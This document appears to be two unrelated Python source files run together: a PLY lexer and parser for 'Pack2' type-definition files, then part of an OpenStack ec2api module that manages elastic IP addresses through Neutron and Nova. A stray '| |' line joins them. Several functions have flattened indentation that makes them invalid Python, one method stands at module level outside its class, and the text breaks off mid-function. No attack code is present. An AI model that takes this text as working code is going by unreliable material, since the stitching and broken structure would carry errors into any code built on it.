  def Build(self, **kwargs):
    # Building the lexer is separate from __init__() because the PLY
    # docs warn against calling lex() from __init__
    self.lexer = lex.lex(object=self, **kwargs)
  # Language keywords; each lower-case spelling maps to an upper-case token.
  keywords = [
      'BITFIELD8',
      'BITFIELD16',
      'BITFIELD32',
      'ENUM8',
      'ENUM16',
      'ENUM32',
      'HEADER',
      'INCLUDE',
      'PARAM',
      'SCALED8',
      'SCALED16',
      'SCALED32',
      'SPECIALIZE',
      'STRING',
      'STRUCT',
  ]
  keyword_map = {keyword.lower(): keyword for keyword in keywords}
  # Full token list exported to the parser.
  tokens = keywords + [
      'ID',
      'COLON',
      'COMMA',
      'EQUAL',
      'SEMICOLON',
      'LCURLY',
      'RCURLY',
      'LPAREN',
      'RPAREN',
      'LSQUARE',
      'RSQUARE',
      'FLOAT_LITERAL',
      'HEX_LITERAL',
      'BIN_LITERAL',
      'NEG_DEC_LITERAL',
      'DEC_LITERAL',
      'STRING_LITERAL',
  ]
  # Ignored characters
  t_ignore = ' \t'
  # Tokens
  #
  # PLY makes use of docstrings in token functions to specify the token regex.
  # Furthermore it uses raw strings because, according the manual, "they are the
  # most convenient way to write regular expression strings."
  #
  # pylint: disable=g-docstring-quotes,g-short-docstring-punctuation
  # The order of the functions here reflects the order in which the
  # lexer matches tokens.
  def t_FLOAT_LITERAL(self, t):
    r'[-+]?[0-9]*\.[0-9]+([eE][-+]?[0-9]+)?'
    self.formatter.AddToken(t.value, ' ')
    t.value = float(t.value)
    return t
  def t_HEX_LITERAL(self, t):
    r'0x[0-9A-Fa-f]+'
    self.formatter.AddToken(t.value, ' ')
    t.value = int(t.value[2:], 16)
    return t
  def t_BIN_LITERAL(self, t):
    r'0b[01]+'
    self.formatter.AddToken(t.value, ' ')
    t.value = int(t.value[2:], 2)
    return t
  def t_NEG_DEC_LITERAL(self, t):
    r'-(0|[1-9][0-9]*)'
    self.formatter.AddToken(t.value, ' ')
    t.value = int(t.value, 10)
    return t
  def t_DEC_LITERAL(self, t):
    r'\+?0|[1-9][0-9]*'
    self.formatter.AddToken(t.value, ' ')
    t.value = int(t.value, 10)
    return t
  def t_STRING_LITERAL(self, t):
    r'"[^"]*"'
    self.formatter.AddToken(t.value, ' ')
    t.value = t.value[1:-1]  # Remove quotes.
    return t
  def t_ID(self, t):
    r'[a-zA-Z_][a-zA-Z0-9_]*'
    self.formatter.AddToken(t.value, ' ')
    # Reclassify identifiers that are actually keywords.
    t.type = self.keyword_map.get(t.value, 'ID')
    return t
  def t_comment(self, t):
    r'//[ \t]*(?P<comment_text>.*)'
    # Comments produce no token; they are routed to the formatter only.
    self.formatter.AddComment(t.lexer.lexmatch.group('comment_text'))
  def t_newline(self, t):
    r'\n+'
    self.formatter.ProcessNewLine(t.value.count('\n'))
    t.lexer.lineno += t.value.count('\n')
  def t_COLON(self, t):
    r':'  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    return t
  def t_COMMA(self, t):
    r','  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    return t
  def t_EQUAL(self, t):
    r'='  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, ' ')
    return t
  def t_SEMICOLON(self, t):
    r';'  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    return t
  def t_LCURLY(self, t):
    r'\{'  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, ' ')
    self.formatter.EnterBlock()
    return t
  def t_RCURLY(self, t):
    r'\}'  # pylint: disable=invalid-name
    self.formatter.ExitBlock()
    self.formatter.AddToken(t.value, '')
    return t
  def t_LPAREN(self, t):
    r'\('  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    self.formatter.EnterBlock()
    return t
  def t_RPAREN(self, t):
    r'\)'  # pylint: disable=invalid-name
    self.formatter.ExitBlock()
    self.formatter.AddToken(t.value, '')
    return t
  def t_LSQUARE(self, t):
    r'\['  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    return t
  def t_RSQUARE(self, t):
    r'\]'  # pylint: disable=invalid-name
    self.formatter.AddToken(t.value, '')
    return t
  def t_error(self, t):
    self.error_func('%d: Illegal character \'%s\'' % (t.lineno, t.value[0]))
    t.lexer.skip(1)
# pylint: enable=g-docstring-quotes,g-short-docstring-punctuation
class _DefaultFileLoader(object):
def __init__(self):
pass
def ReadFile(self, file_name):
with open(file_name, 'r') as f:
contents = f.read()
return contents
class Parser(object):
  """Parser for Pack2 definition files."""

  def __init__(self, file_loader=None, loaded_files=None):
    self.lexer = Lexer(error_func=self._RecordError)
    self.lexer.Build()
    self.tokens = self.lexer.tokens
    # Shared across nested include parses so each file is loaded only once.
    if loaded_files:
      self.loaded_files = loaded_files
    else:
      self.loaded_files = set()
    if file_loader is None:
      self.file_loader = _DefaultFileLoader()
    else:
      self.file_loader = file_loader
    self.include_re = re.compile(r'(.*)\.p2$')
    # TODO: Investigate generating tables at build time and
    # packaging them with the library.
    self.parser = yacc.yacc(module=self, debug=False, write_tables=False)

  def Parse(self, string):
    """Parse a Pack2 definition string.

    Returns:
      A metadata.Metadata describing the parsed types.

    Raises:
      ParseError: If the source contains syntax or semantic errors.
    """
    self.valid = True
    self.metadata = metadata.Metadata()
    self.errors = []
    try:
      self.parser.parse(string, tracking=True)
    except IndexError as e:
      # Due to a bug in PLY, an index error is caused if we raise a syntax
      # error. If we've previously raised a syntax error, ignore it so that
      # we can raise a ParseError instead.
      if self.valid:
        raise e
    if not self.valid:
      raise ParseError('Parse Error', self.errors)
    return self.metadata

  def GetFormattedSource(self):
    """Return the canonically formatted source for the last parsed file."""
    preamble = self.lexer.formatter.preamble
    if self.metadata.includes:
      if preamble:
        preamble += '\n'
      # Include directives are re-emitted in sorted order.
      for inc in sorted(self.metadata.includes):
        preamble += ('include "%s.p2";\n' % inc)
      preamble += '\n'
    return preamble + self.lexer.formatter.formatted + '\n'

  def _RecordError(self, string):
    """Record an error message and mark the parse as failed."""
    self.valid = False
    self.errors.append(string)

  def _RaiseError(self, string):
    """Record an error message and abort the current production."""
    self._RecordError(string)
    raise SyntaxError(string)

  def HandleWidthType(self, base_name, p):
    """Common handling for types that have 8, 16, and 32 bit widths.

    Grammar for type should be of the following form:
      type_def : type_keyword ID LCURLY type_body RCURLY

    Args:
      base_name: The type's base name (eg. 'enum', 'bitfield', or 'scaled'.)
      p: The PLY parser arguments from the production rule.

    Returns:
      A dict containing 'type', 'name', 'body', and 'width'.
    """
    info = {
        'type': p[1],
        'name': p[2],
        'body': p[4],
    }
    if info['type'] == base_name + '8':
      info['width'] = 1
    elif info['type'] == base_name + '16':
      info['width'] = 2
    elif info['type'] == base_name + '32':
      info['width'] = 4
    else:
      self._RaiseError('%d: invalid %s type %s.\n'
                       % (p.lineno(1), base_name, info['type']))
    return info

  def ResolveType(self, type_name, lineno=-1):
    """Look up type_name in the metadata, aborting the parse if unknown."""
    if type_name not in self.metadata.type_map:
      self._RaiseError('%d: Type \'%s\' unknown.\n' % (lineno, type_name))
      raise SyntaxError
    return self.metadata.type_map[type_name]

  # PLY makes use of docstrings in production function to specify the grammar.
  # These do not conform to the google style for doc strings.
  #
  # pylint: disable=g-short-docstring-punctuation
  # pylint: disable=g-doc-args
  # pylint: disable=g-no-space-after-docstring-summary
  def p_file(self, p):
    """file : bitfield_def file
            | enum_def file
            | header_def file
            | include_def file
            | param_def file
            | scaled_def file
            | specialize_def file
            | struct_def file
            |
    """

  def p_include_def(self, p):
    """include_def : INCLUDE STRING_LITERAL SEMICOLON"""
    file_name = p[2]
    match = self.include_re.match(file_name)
    if not match:
      self._RaiseError('%d: %s is not named like a p2 file.' % (p.lineno(2),
                                                                file_name))
    path = match.group(1)
    if file_name in self.loaded_files:
      # Already parsed (possibly via another include); skip re-parsing.
      return
    self.loaded_files.add(file_name)
    contents = self.file_loader.ReadFile(file_name)
    parser = Parser(file_loader=self.file_loader,
                    loaded_files=self.loaded_files)
    meta = parser.Parse(contents)
    try:
      self.metadata.AddInclude(path, meta)
    except ValueError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_struct_def(self, p):
    """struct_def : STRUCT ID LCURLY struct_body RCURLY"""
    name = p[2]
    body = p[4]
    try:
      self.metadata.AddType(metadata.StructType(name, body))
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_enum_def(self, p):
    """enum_def : enum_keyword ID LCURLY enum_body RCURLY"""
    try:
      info = self.HandleWidthType('enum', p)
      enum = metadata.EnumType(info['name'], info['width'], info['body'])
      self.metadata.AddType(enum)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))
    except ValueError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_enum8_keyword(self, p):
    """enum_keyword : ENUM8
                    | ENUM16
                    | ENUM32
    """
    p[0] = p[1]

  def p_bitfield_def(self, p):
    """bitfield_def : bitfield_keyword ID LCURLY bitfield_body RCURLY"""
    try:
      info = self.HandleWidthType('bitfield', p)
      bitfield = metadata.BitfieldType(info['name'],
                                       info['width'],
                                       info['body'])
      self.metadata.AddType(bitfield)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))
    except ValueError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_bitfield8_keyword(self, p):
    """bitfield_keyword : BITFIELD8
                        | BITFIELD16
                        | BITFIELD32
    """
    p[0] = p[1]

  def p_scaled_def(self, p):
    """scaled_def : scaled_keyword ID LCURLY scaled_body RCURLY"""
    try:
      info = self.HandleWidthType('scaled', p)
      # Scaled types require both 'scale' and 'offset' properties.
      if 'scale' not in info['body']:
        self._RaiseError('%d: Scaled type %s does not contain scale property.'
                         % (p.lineno(2), info['name']))
      if 'offset' not in info['body']:
        self._RaiseError('%d: Scaled type %s does not contain offset property.'
                         % (p.lineno(2), info['name']))
      scale = info['body']['scale']
      offset = info['body']['offset']
      scaled = metadata.ScaledType(info['name'], info['width'],
                                   offset=offset, scale=scale)
      self.metadata.AddType(scaled)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))
    except ValueError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_scaled8_keyword(self, p):
    """scaled_keyword : SCALED8
                      | SCALED16
                      | SCALED32
    """
    p[0] = p[1]

  def p_param_def(self, p):
    """param_def : PARAM ID LCURLY struct_body RCURLY"""
    name = p[2]
    body = p[4]
    try:
      param = metadata.Param(name, body)
      self.metadata.AddType(param)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_header_def(self, p):
    """header_def : HEADER ID LCURLY struct_body RCURLY"""
    name = p[2]
    body = p[4]
    try:
      header = metadata.Header(name, body)
      self.metadata.AddType(header)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  # NOTE: renamed from the typo'd p_speclialize_def; PLY only requires the
  # 'p_' prefix, so the rename does not affect the grammar.
  # pylint: disable=line-too-long
  def p_specialize_def(self, p):
    """specialize_def : SPECIALIZE LPAREN ID RPAREN ID LCURLY struct_body RCURLY"""
    # pylint: enable=line-too-long
    parent_name = p[3]
    name = p[5]
    body = p[7]
    if parent_name not in self.metadata.type_map:
      self._RaiseError('%d: Unknown parent type %s.\n'
                       % (p.lineno(2), parent_name))
    parent_type = self.metadata.type_map[parent_name]
    try:
      new_type = parent_type.Specialize(name, body)
      self.metadata.AddType(new_type)
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))
    except ValueError as e:
      self._RaiseError('%d: %s\n' % (p.lineno(2), e))

  def p_struct_body(self, p):
    """struct_body : struct_body field_def
                   | field_def
    """
    try:
      if len(p) == 2:
        line = p.lineno(1)
        body = metadata.StructBody()
        body.AddField(p[1])
      elif len(p) == 3:
        line = p.lineno(2)
        body = p[1]
        body.AddField(p[2])
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (line, e))
    p[0] = body

  def p_field_def(self, p):
    """field_def : ID ID SEMICOLON"""
    type_name = p[1]
    name = p[2]
    field_type = self.ResolveType(type_name, p.lineno(1))
    p[0] = metadata.StructField(field_type, name)

  def p_string_field_def(self, p):
    """field_def : STRING LSQUARE unsigned_literal RSQUARE ID SEMICOLON"""
    length = p[3]
    name = p[5]
    type_obj = metadata.StringType(length)
    p[0] = metadata.StructField(type_obj, name)

  def p_array_field_def(self, p):
    """field_def : ID ID LSQUARE unsigned_literal RSQUARE SEMICOLON"""
    type_name = p[1]
    name = p[2]
    extent = p[4]
    field_type = self.ResolveType(type_name, p.lineno(1))
    p[0] = metadata.StructField(field_type, name, extent)

  def p_enum_body(self, p):
    """enum_body : enum_body enum_value
                 | enum_value
    """
    try:
      if len(p) == 2:
        line = p.lineno(1)
        value = p[1]
        body = metadata.EnumBody()
      elif len(p) == 3:
        line = p.lineno(2)
        value = p[2]
        body = p[1]
      body.AddValue(value[0], value[1])
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (line, e))
    p[0] = body

  def p_enum_value(self, p):
    """enum_value : ID EQUAL signed_literal COMMA"""
    p[0] = (p[1], p[3])

  def p_bitfield_body(self, p):
    """bitfield_body : bitfield_body bitfield_value
                     | bitfield_value
    """
    try:
      if len(p) == 2:
        line = p.lineno(1)
        value = p[1]
        body = metadata.BitfieldBody()
      elif len(p) == 3:
        line = p.lineno(2)
        value = p[2]
        body = p[1]
      body.AddFlag(value[0], value[1])
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (line, e))
    p[0] = body

  def p_scaled_body(self, p):
    """scaled_body : scaled_body scaled_property
                   | scaled_property
    """
    try:
      if len(p) == 2:
        line = p.lineno(1)
        value = p[1]
        body = {}
      elif len(p) == 3:
        line = p.lineno(2)
        value = p[2]
        body = p[1]
      if value[0] in body:
        self._RaiseError('%d: Scaled property %s repeated.' % (line, value[0]))
      body[value[0]] = value[1]
    except SyntaxError as e:
      self._RaiseError('%d: %s\n' % (line, e))
    p[0] = body

  def p_scaled_property(self, p):
    """scaled_property : ID EQUAL FLOAT_LITERAL COMMA
                       | ID EQUAL signed_literal COMMA
    """
    name = p[1]
    value = p[3]
    if name != 'scale' and name != 'offset':
      self._RaiseError('%d: Unknown scaled property %s.' % (p.lineno(1), name))
    p[0] = (name, value)

  def p_bitfield_value(self, p):
    """bitfield_value : unsigned_literal COLON ID COMMA"""
    p[0] = (p[3], p[1])

  def p_unsigned_literal(self, p):
    """unsigned_literal : HEX_LITERAL
                        | DEC_LITERAL
                        | BIN_LITERAL
    """
    p[0] = p[1]

  def p_signed_literal(self, p):
    """signed_literal : unsigned_literal
                      | NEG_DEC_LITERAL
    """
    p[0] = p[1]

  def p_error(self, p):
    self.valid = False
    if p is None:
      # PLY calls p_error(None) on unexpected end of input; the previous
      # code assumed a token and crashed with AttributeError.
      self.errors.append('Syntax error at end of file\n')
    else:
      self.errors.append('%d: Syntax error at \'%s\'\n' % (p.lineno, p.value))
  # pylint: enable=g-short-docstring-punctuation
  # pylint: enable=g-doc-args
  # pylint: enable=g-no-space-after-docstring-summary
  # pylint: enable=invalid-name
| |
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from neutronclient.common import exceptions as neutron_exception
except ImportError:
pass # clients will log absense of neutronclient in this case
from oslo_config import cfg
from oslo_log import log as logging
from ec2api.api import common
from ec2api.api import ec2utils
from ec2api.api import internet_gateway as internet_gateway_api
from ec2api import clients
from ec2api.db import api as db_api
from ec2api import exception
from ec2api.i18n import _
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# NOTE(review): the string below was presumably intended as the module
# docstring, but because it follows other statements Python treats it as a
# no-op string expression rather than __doc__.
"""Address related API implementation
"""
# Shorthand for the common parameter validator used by the API layer.
Validator = common.Validator
def get_address_engine():
    """Build and return the engine implementing address operations."""
    engine = AddressEngineNeutron()
    return engine
def allocate_address(context, domain=None):
    """Allocate an elastic IP, optionally restricted to a domain.

    Raises InvalidParameterValue when a non-empty domain is neither
    'vpc' nor 'standard'.
    """
    valid_domains = ('vpc', 'standard')
    if domain and domain not in valid_domains:
        raise exception.InvalidParameterValue(
            _("Invalid value '%(domain)s' for domain.") % {'domain': domain})
    address, os_floating_ip = address_engine.allocate_address(context, domain)
    return _format_address(context, address, os_floating_ip)
def associate_address(context, public_ip=None, instance_id=None,
                      allocation_id=None, network_interface_id=None,
                      private_ip_address=None, allow_reassociation=False):
    """Associate an elastic IP with an instance or a network interface.

    Exactly one of public_ip / allocation_id and at least one of
    instance_id / network_interface_id must be supplied.
    """
    if not public_ip and not allocation_id:
        raise exception.MissingParameter(
            _('Either public IP or allocation id must be specified'))
    if public_ip and allocation_id:
        raise exception.InvalidParameterCombination(
            _('You may specify public IP or allocation id, '
              'but not both in the same call'))
    if not instance_id and not network_interface_id:
        raise exception.MissingParameter(
            _('Either instance ID or network interface id must be specified'))
    association_id = address_engine.associate_address(
        context, public_ip, instance_id,
        allocation_id, network_interface_id,
        private_ip_address, allow_reassociation)
    result = {'return': True}
    # EC2-classic associations have no association id.
    if association_id:
        result['associationId'] = association_id
    return result
def disassociate_address(context, public_ip=None, association_id=None):
    """Disassociate an elastic IP, given either its public IP or its
    association id (exactly one of the two)."""
    if not public_ip and not association_id:
        raise exception.MissingParameter(
            _('Either public IP or association id must be specified'))
    if public_ip and association_id:
        raise exception.InvalidParameterCombination(
            _('You may specify public IP or association id, '
              'but not both in the same call'))
    address_engine.disassociate_address(context, public_ip, association_id)
    return True
def release_address(context, public_ip=None, allocation_id=None):
    """Release an elastic IP, given either its public IP or its
    allocation id (exactly one of the two)."""
    if not public_ip and not allocation_id:
        raise exception.MissingParameter(
            _('Either public IP or allocation id must be specified'))
    if public_ip and allocation_id:
        raise exception.InvalidParameterCombination(
            _('You may specify public IP or allocation id, '
              'but not both in the same call'))
    address_engine.release_address(context, public_ip, allocation_id)
    return True
class AddressDescriber(common.UniversalDescriber):
    """Describer for elastic IP addresses ('eipalloc' DB items)."""

    KIND = 'eipalloc'
    FILTER_MAP = {'allocation-id': 'allocationId',
                  'association-id': 'associationId',
                  'domain': 'domain',
                  'instance-id': 'instanceId',
                  'network-interface-id': 'networkInterfaceId',
                  'network-interface-owner-id': 'networkInterfaceOwnerId',
                  'private-ip-address': 'privateIpAddress',
                  'public-ip': 'publicIp'}

    def __init__(self, os_ports, db_instances):
        self.os_ports = os_ports
        self.db_instances_dict = {inst['os_id']: inst
                                  for inst in (db_instances or [])}

    def format(self, item=None, os_item=None):
        return _format_address(self.context, item, os_item, self.os_ports,
                               self.db_instances_dict)

    def get_os_items(self):
        return address_engine.get_os_floating_ips(self.context)

    def auto_update_db(self, item, os_item):
        # Drop stale association info when the floating IP is no longer
        # attached to the port/IP recorded in the DB item.
        item = super(AddressDescriber, self).auto_update_db(item, os_item)
        is_associated = item and 'network_interface_id' in item
        if is_associated and (
                not os_item.get('port_id') or
                os_item['fixed_ip_address'] != item['private_ip_address']):
            _disassociate_address_item(self.context, item)
        return item

    def get_name(self, os_item):
        return os_item['floating_ip_address']
def describe_addresses(context, public_ip=None, allocation_id=None,
                       filter=None):
    """Describe elastic IP addresses visible to the caller."""
    describer = AddressDescriber(
        address_engine.get_os_ports(context),
        db_api.get_items(context, 'i'))
    formatted = describer.describe(context, allocation_id, public_ip, filter)
    return {'addressesSet': formatted}
def _format_address(context, address, os_floating_ip, os_ports=None,
                    db_instances_dict=None):
    """Build an EC2 API address structure from DB and OS data.

    Args:
        context: Request context (used for id translation).
        address: DB 'eipalloc' item, or None for an EC2-classic address.
        os_floating_ip: Neutron floating IP dict.
        os_ports: Optional list of Neutron port dicts used to resolve the
            attached instance.
        db_instances_dict: Optional os_id -> db item cache for instances.

    Returns:
        A dict in EC2 'address' format.
    """
    # NOTE: default changed from a shared mutable [] to None to avoid the
    # mutable-default-argument pitfall; behavior for callers is unchanged.
    if os_ports is None:
        os_ports = []
    ec2_address = {'publicIp': os_floating_ip['floating_ip_address']}
    fixed_ip_address = os_floating_ip.get('fixed_ip_address')
    if fixed_ip_address:
        ec2_address['privateIpAddress'] = fixed_ip_address
    os_instance_id = _get_os_instance_id(context, os_floating_ip, os_ports)
    if os_instance_id:
        ec2_address['instanceId'] = (
            _get_instance_ec2_id_by_os_id(context, os_instance_id,
                                          db_instances_dict))
    if not address:
        # Untracked floating IP: an EC2-classic address.
        ec2_address['domain'] = 'standard'
    else:
        ec2_address['domain'] = 'vpc'
        ec2_address['allocationId'] = address['id']
        if 'network_interface_id' in address:
            ec2_address.update({
                'associationId': ec2utils.change_ec2_id_kind(
                    ec2_address['allocationId'], 'eipassoc'),
                'networkInterfaceId': address['network_interface_id'],
                'networkInterfaceOwnerId': context.project_id})
    return ec2_address
def _get_instance_ec2_id_by_os_id(context, os_instance_id, db_instances_dict):
    """Translate an OpenStack instance id into its EC2 instance id."""
    instance = ec2utils.get_db_item_by_os_id(context, 'i', os_instance_id,
                                             db_instances_dict)
    return instance['id']
def _is_address_valid(context, neutron, address):
try:
neutron.show_floatingip(address['os_id'])
except neutron_exception.NotFound:
return False
else:
return True
def _associate_address_item(context, address, network_interface_id,
                            private_ip_address):
    """Record an association on the address DB item and persist it."""
    address.update(network_interface_id=network_interface_id,
                   private_ip_address=private_ip_address)
    db_api.update_item(context, address)
def _disassociate_address_item(context, address):
    """Remove association info from the address DB item and persist it."""
    del address['network_interface_id']
    del address['private_ip_address']
    db_api.update_item(context, address)
def _get_os_instance_id(context, os_floating_ip, os_ports=[]):
port_id = os_floating_ip.get('port_id')
os_instance_id = None
if port_id:
port = next((port for port in os_ports
if port['id'] == port_id), None)
if port and port.get('device_owner').startswith('compute:'):
os_instance_id = port.get('device_id')
return os_instance_id
class AddressEngineNeutron(object):
    def allocate_address(self, context, domain=None):
        """Create a floating IP; track VPC addresses in the DB.

        Returns:
            A (db_item, os_floating_ip) pair; db_item is None for
            EC2-classic (standard domain) addresses.
        """
        os_public_network = ec2utils.get_os_public_network(context)
        neutron = clients.neutron(context)
        with common.OnCrashCleaner() as cleaner:
            os_floating_ip = {'floating_network_id': os_public_network['id']}
            try:
                os_floating_ip = neutron.create_floatingip(
                    {'floatingip': os_floating_ip})
            except neutron_exception.OverQuotaClient:
                raise exception.AddressLimitExceeded()
            os_floating_ip = os_floating_ip['floatingip']
            if ((not domain or domain == 'standard') and
                    not CONF.disable_ec2_classic):
                # EC2-classic address: not tracked in the DB layer.
                return None, os_floating_ip
            # VPC address: undo the Neutron allocation if the DB add fails.
            cleaner.addCleanup(neutron.delete_floatingip, os_floating_ip['id'])
            address = {'os_id': os_floating_ip['id'],
                       'public_ip': os_floating_ip['floating_ip_address']}
            address = db_api.add_item(context, 'eipalloc', address)
        return address, os_floating_ip
    def release_address(self, context, public_ip, allocation_id):
        """Delete a floating IP given its public IP or allocation id.

        EC2-classic addresses (public_ip) are deleted directly in Neutron;
        VPC addresses (allocation_id) are disassociated if needed, removed
        from the DB, then deleted in Neutron.
        """
        neutron = clients.neutron(context)
        if public_ip:
            # TODO(ft): implement search in DB layer
            address = next((addr for addr in
                            db_api.get_items(context, 'eipalloc')
                            if addr['public_ip'] == public_ip), None)
            if address and _is_address_valid(context, neutron, address):
                # A DB-tracked (VPC) address must be released by its
                # allocation id, not by public IP.
                msg = _('You must specify an allocation id when releasing a '
                        'VPC elastic IP address')
                raise exception.InvalidParameterValue(msg)
            os_floating_ip = self.get_os_floating_ip_by_public_ip(context,
                                                                  public_ip)
            try:
                neutron.delete_floatingip(os_floating_ip['id'])
            except neutron_exception.NotFound:
                # Already gone in Neutron; release is idempotent.
                pass
            return
        address = ec2utils.get_db_item(context, allocation_id)
        if not _is_address_valid(context, neutron, address):
            raise exception.InvalidAllocationIDNotFound(
                id=allocation_id)
        if 'network_interface_id' in address:
            if CONF.disable_ec2_classic:
                # In VPC-only mode, an address associated within the default
                # VPC is implicitly disassociated before release.
                network_interface_id = address['network_interface_id']
                network_interface = db_api.get_item_by_id(context,
                                                          network_interface_id)
                default_vpc = ec2utils.check_and_create_default_vpc(context)
                if default_vpc:
                    default_vpc_id = default_vpc['id']
                # NOTE(review): if default_vpc is None, default_vpc_id below
                # is unbound (NameError) — verify that
                # check_and_create_default_vpc cannot return None here.
                if (network_interface and
                        network_interface['vpc_id'] == default_vpc_id):
                    association_id = ec2utils.change_ec2_id_kind(address['id'],
                                                                 'eipassoc')
                    self.disassociate_address(
                        context, association_id=association_id)
                else:
                    raise exception.InvalidIPAddressInUse(
                        ip_address=address['public_ip'])
            else:
                raise exception.InvalidIPAddressInUse(
                    ip_address=address['public_ip'])
        with common.OnCrashCleaner() as cleaner:
            db_api.delete_item(context, address['id'])
            cleaner.addCleanup(db_api.restore_item, context,
                               'eipalloc', address)
            try:
                neutron.delete_floatingip(address['os_id'])
            except neutron_exception.NotFound:
                # Nothing left to delete in Neutron; DB removal stands.
                pass
    def associate_address(self, context, public_ip=None, instance_id=None,
                          allocation_id=None, network_interface_id=None,
                          private_ip_address=None, allow_reassociation=False):
        """Associate a floating IP with an instance or network interface.

        Handles both the EC2-classic path (nova add_floating_ip, returns
        None) and the VPC path (neutron floating IP update, returns an
        association id).
        """
        instance_network_interfaces = []
        if instance_id:
            # TODO(ft): implement search in DB layer
            for eni in db_api.get_items(context, 'eni'):
                if eni.get('instance_id') == instance_id:
                    instance_network_interfaces.append(eni)
        neutron = clients.neutron(context)
        if public_ip:
            # TODO(ft): implement search in DB layer
            address = next((addr for addr in db_api.get_items(context,
                                                              'eipalloc')
                            if addr['public_ip'] == public_ip), None)
            if not CONF.disable_ec2_classic:
                # EC2-classic path: attach the floating IP via nova.
                if instance_network_interfaces:
                    msg = _('You must specify an allocation id when mapping '
                            'an address to a VPC instance')
                    raise exception.InvalidParameterCombination(msg)
                if address and _is_address_valid(context, neutron, address):
                    msg = _(
                        "The address '%(public_ip)s' does not belong to you.")
                    raise exception.AuthFailure(msg % {'public_ip': public_ip})
                os_instance_id = ec2utils.get_db_item(context,
                                                      instance_id)['os_id']
                # NOTE(ft): check the public IP exists to raise AWS exception
                # otherwise
                self.get_os_floating_ip_by_public_ip(context, public_ip)
                nova = clients.nova(context)
                nova.servers.add_floating_ip(os_instance_id, public_ip)
                return None
            if not address:
                msg = _("The address '%(public_ip)s' does not belong to you.")
                raise exception.AuthFailure(msg % {'public_ip': public_ip})
            # Fall through to the VPC path using the resolved allocation id.
            allocation_id = address['id']
        if instance_id:
            if not instance_network_interfaces:
                # NOTE(ft): check the instance exists
                ec2utils.get_db_item(context, instance_id)
                msg = _('You must specify an IP address when mapping '
                        'to a non-VPC instance')
                raise exception.InvalidParameterCombination(msg)
            if len(instance_network_interfaces) > 1:
                # Ambiguous: the instance has several network interfaces.
                raise exception.InvalidInstanceId(instance_id=instance_id)
            network_interface = instance_network_interfaces[0]
        else:
            network_interface = ec2utils.get_db_item(context,
                                                     network_interface_id)
        if not private_ip_address:
            private_ip_address = network_interface['private_ip_address']
        address = ec2utils.get_db_item(context, allocation_id)
        if not _is_address_valid(context, neutron, address):
            raise exception.InvalidAllocationIDNotFound(
                id=allocation_id)
        if address.get('network_interface_id') == network_interface['id']:
            # NOTE(ft): idempotent call
            pass
        elif address.get('network_interface_id') and not allow_reassociation:
            msg = _('resource %(eipalloc_id)s is already associated with '
                    'associate-id %(eipassoc_id)s')
            msg = msg % {'eipalloc_id': allocation_id,
                         'eipassoc_id': ec2utils.change_ec2_id_kind(
                             address['id'], 'eipassoc')}
            raise exception.ResourceAlreadyAssociated(msg)
        else:
            # A new association requires the VPC to have an internet gateway.
            internet_gateways = (
                internet_gateway_api.describe_internet_gateways(
                    context,
                    filter=[{'name': 'attachment.vpc-id',
                             'value': [network_interface['vpc_id']]}])
                ['internetGatewaySet'])
            if len(internet_gateways) == 0:
                msg = _('Network %(vpc_id)s is not attached to any internet '
                        'gateway') % {'vpc_id': network_interface['vpc_id']}
                raise exception.GatewayNotAttached(msg)
        with common.OnCrashCleaner() as cleaner:
            # Record the association in the DB first; roll it back if the
            # Neutron update below fails.
            _associate_address_item(context, address,
                                    network_interface['id'],
                                    private_ip_address)
            cleaner.addCleanup(_disassociate_address_item, context,
                               address)
            os_floating_ip = {'port_id': network_interface['os_id'],
                              'fixed_ip_address': private_ip_address}
            neutron.update_floatingip(address['os_id'],
                                      {'floatingip': os_floating_ip})
        # TODO(ft): generate unique association id for each act of association
        return ec2utils.change_ec2_id_kind(address['id'], 'eipassoc')
def disassociate_address(self, context, public_ip=None,
                         association_id=None):
    """Detach an elastic IP from the instance/port it is mapped to.

    Mirrors AWS DisassociateAddress: callers pass either ``public_ip``
    (EC2-Classic addressing) or ``association_id`` (VPC addressing).

    :param context: request context (credentials, project scope).
    :param public_ip: elastic IP to unmap (EC2-Classic style).
    :param association_id: eipassoc-... id of the association (VPC style).
    :returns: None.
    :raises exception.InvalidParameterValue: ``public_ip`` was given for an
        address that must be disassociated by id.
    :raises exception.AuthFailure: the address does not belong to the caller.
    :raises exception.InvalidAssociationIDNotFound: unknown association id.
    """
    neutron = clients.neutron(context)
    if public_ip:
        # TODO(ft): implement search in DB layer
        address = next((addr for addr in db_api.get_items(context,
                                                          'eipalloc')
                        if addr['public_ip'] == public_ip), None)
        if not CONF.disable_ec2_classic:
            # EC2-Classic mode: a VPC-backed address still must be
